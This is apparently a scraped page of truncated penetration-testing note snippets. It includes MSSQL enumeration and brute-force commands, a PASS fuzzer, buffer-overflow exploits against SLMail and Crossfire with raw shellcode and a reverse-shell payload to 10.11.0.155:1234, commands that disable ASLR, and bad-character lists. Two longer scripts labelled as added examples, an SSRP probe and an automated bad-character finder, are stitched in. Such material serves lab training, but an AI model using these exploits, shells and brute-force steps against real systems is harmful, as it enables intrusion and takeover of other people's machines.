Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-25 11:08:36

[>] Enumerate MSSQL Servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" in Microsoft SQL Server Management Studio. The msf module, the nmap scan as written (-sU) and the "Browse for More" dialog all ask the SQL Server Browser service on UDP 1434 for its instance list; if that service is stopped or filtered, none of them will see the host, so fall back to a TCP scan of 1433 (and the high dynamic ports that named instances use).

[>] Bruteforce MSSQL Database:

msf auxiliary(mssql_login) > use auxiliary/scanne...
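The enumeration commands above all rely on the same one-byte probe to the SQL Server Browser service. The script below, added here as an example and not part of the original note, sends that probe itself and parses the reply into one record per instance, so you can see exactly what mssql_ping and ms-sql-info are reading. The host names, ports and the sample datagram are constructed for illustration; the wire format (0x05, little-endian length, semicolon-separated key/value pairs, instances ending in ";;") is the real SSRP layout.

```python
#!/usr/bin/env python3
"""Probe the SQL Server Browser service (SSRP, UDP 1434) and parse what it returns.

Added example, not the note author's script. Host names and the sample datagram
below are constructed for illustration.
"""
import socket
import struct
import sys

SSRP_PORT = 1434
CLNT_UCAST_EX = b"\x02"   # "list every instance on this host"
SVR_RESP = 0x05           # first byte of every Browser reply


def parse_ssrp_response(datagram: bytes) -> list:
    """Turn a SVR_RESP datagram into one dict per instance.

    Wire format: 0x05, little-endian u16 length, then an ASCII string of
    key;value pairs; instances are separated by ";;" and the string ends in ";;".
    """
    if len(datagram) < 3 or datagram[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP datagram")
    (length,) = struct.unpack_from("<H", datagram, 1)
    body = datagram[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for chunk in body.split(";;"):
        fields = chunk.split(";")
        if len(fields) < 2 or not fields[0]:
            continue                      # trailing empty chunk after the final ";;"
        instances.append({fields[i]: fields[i + 1] for i in range(0, len(fields) - 1, 2)})
    return instances


def probe(host: str, timeout: float = 2.0) -> list:
    """Send CLNT_UCAST_EX to one host; [] means no answer (Browser stopped, filtered, or instance hidden)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(CLNT_UCAST_EX, (host, SSRP_PORT))
        try:
            data, _ = s.recvfrom(65535)
        except socket.timeout:
            return []
    return parse_ssrp_response(data)


# Constructed sample reply: a default instance on 1433 and a named instance on a dynamic port.
SAMPLE_BODY = (
    b"ServerName;SQL01;InstanceName;MSSQLSERVER;IsClustered;No;Version;14.0.1000.169;tcp;1433;;"
    b"ServerName;SQL01;InstanceName;SQLEXPRESS;IsClustered;No;Version;14.0.1000.169;"
    b"tcp;49672;np;\\\\SQL01\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;"
)
SAMPLE_DATAGRAM = bytes([SVR_RESP]) + struct.pack("<H", len(SAMPLE_BODY)) + SAMPLE_BODY


if __name__ == "__main__":
    # Same two lab hosts the nmap line above scans, unless overridden on the command line.
    targets = sys.argv[1:] or ["192.168.1.108", "192.168.1.156"]
    for host in targets:
        for inst in probe(host):
            print(f"{host}: {inst.get('InstanceName')} v{inst.get('Version')} "
                  f"tcp/{inst.get('tcp', '-')} np={inst.get('np', '-')}")
```

The "tcp" field is the one to feed into mssql_login: named instances rarely sit on 1433, and the Browser reply is the only place that port is advertised without authenticating.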


Score: 0


1. Install OpenSSL

sudo apt-get install openssl

2. Generate a 2048-bit RSA key and a self-signed certificate valid for 1095 days (three years). -nodes writes the private key unencrypted so Apache can start without a passphrase, so keep /etc/ssl/private/server.key readable by root only:

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key

3. Enable SSL for Apache

sudo a2enmod ssl

4. Put the default-ssl site available crea...


Score: 0


#!/usr/bin/python
import socket

#create an array of buffers, while incrementing them

buffer=["A"]
counter=100
while len(buffer) <=30:
    buffer.append("A"*counter)
    counter=counter+200

for string in buffer:
    print "Fuzzing PASS with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET, socket.SOCK_S...


Score: 0


#!/usr/bin/env ruby

=begin
takes advantage of the LONG_PASS buffer overflow vulnerability in SLMAIL.
uses windows/shell_reverse_tcp payload
connects to 10.11.0.155:1234
encoded with 1 pass of x86/shikata_ga_nai
=end

require 'socket'

#bad chars = "\x00\x0a\x0d"
#jmp esp addre...


Score: 0

By: ajayverma 2019-06-25 10:11:42

prefix = "\x41" * 80
eip = "\x42" * 4
nop = "\x90" * (400 - 137)
buf = ""
buf += "\xba\x8a\x2a\xb0\xa4\xd9\xed\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x1c\x31\x55\x14\x03\x55\x14\x83\xed\xfc\x68"
buf += "\xdf\xda\xd9\x34\xb9\xa9\x25\x7d\x...


Score: 0

By: ajayverma 2019-06-25 10:11:46

#!/usr/bin/python
import socket

host = "127.0.0.1"

crash = "\x41" * 4379

buffer = "\x11(setup sound " + crash + "\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host, 13327))
s.send(buffer)
data=s.recv(1024)
print data
...


Score: 0


#!/usr/bin/env ruby

=begin
This exploit takes advantage of a buffer overflow vulnerability during the
sound setup stage of the game Crossfire.
=end

require 'socket'

#total size = 4379
#offset = 4368
#bad chars = "\x00\x0a\x0d\x20"

#add eax, 12 = 83C00C
#jmp eax = FFE0


#create shellcode
#creates a bi...


Score: 0


cat /proc/sys/kernel/randomize_va_space
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
cat /proc/sys/kernel/randomize_va_space
# verify "0" (ASLR fully off for every process; the normal default is 2, so do this on the lab box only)
ulimit -c unlimited
ulimit -c...


Score: 0

By: ajayverma 2019-06-25 10:11:58

badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b" +
"\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a" +
"\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4...
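The badchars string above is step one of a loop: send every byte value, dump the buffer from the debugger, remove the first byte that did not survive, resend, repeat until the dump matches. The script below, added here as an example and not from the note, automates that loop around a read_back() callback that stands in for the manual debugger step. fake_target() is a constructed target that mangles the Crossfire bad chars (\x00 \x0a \x0d \x20) so the loop can be run offline.

```python
#!/usr/bin/env python3
"""Bad-character discovery: build the test string, compare it with what the
debugger shows in memory, drop the first mangled byte, repeat until clean.

Added example, not from the original note. read_back() is the manual dump step;
fake_target() is a constructed target for an offline run.
"""


def badchar_string(exclude=(0x00,)) -> bytes:
    """Every byte value in order, minus the ones already known bad (\\x00 nearly always is)."""
    skip = set(exclude)
    return bytes(b for b in range(256) if b not in skip)


def as_escaped(data: bytes) -> str:
    """Render bytes the way the note writes them: \\x00\\x01\\x02..."""
    return "".join("\\x%02x" % b for b in data)


def first_badchar(sent: bytes, dumped: bytes):
    """First byte of `sent` that is missing or altered in `dumped`, or None.

    Only the first mismatch is trustworthy: once one byte is dropped or expanded,
    everything after it is shifted, so stop there and resend without it.
    """
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def discover_badchars(read_back, known=(0x00,), max_rounds=16) -> list:
    """Send/compare until the dump is clean; returns the sorted list of bad byte values."""
    bad = set(known)
    for _ in range(max_rounds):
        payload = badchar_string(bad)
        found = first_badchar(payload, read_back(payload))
        if found is None:
            return sorted(bad)
        bad.add(found)
    raise RuntimeError("still finding bad chars after %d rounds" % max_rounds)


def fake_target(payload: bytes) -> bytes:
    """Constructed target: strips CR/LF (line-oriented parser) and turns space into NUL (token split)."""
    return payload.replace(b"\x0a", b"").replace(b"\x0d", b"").replace(b"\x20", b"\x00")


if __name__ == "__main__":
    bad = discover_badchars(fake_target)
    print("bad chars:", as_escaped(bytes(bad)))
    print("clean test string:", as_escaped(badchar_string(bad)))
```

One round per bad byte is the honest way to do this: a dropped \x0a shifts every later byte by one, so comparing past the first mismatch would flag the whole remainder as bad.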


Score: 0


There are many distributions of Linux, and they all do things a little differently regarding default security and built-in tool sets. This means that when engaging these different flavors during a pentest, what works against one Linux target to get an interactive shell may not work against another. Well, not to worry my friends, there are many technique...


Score: 0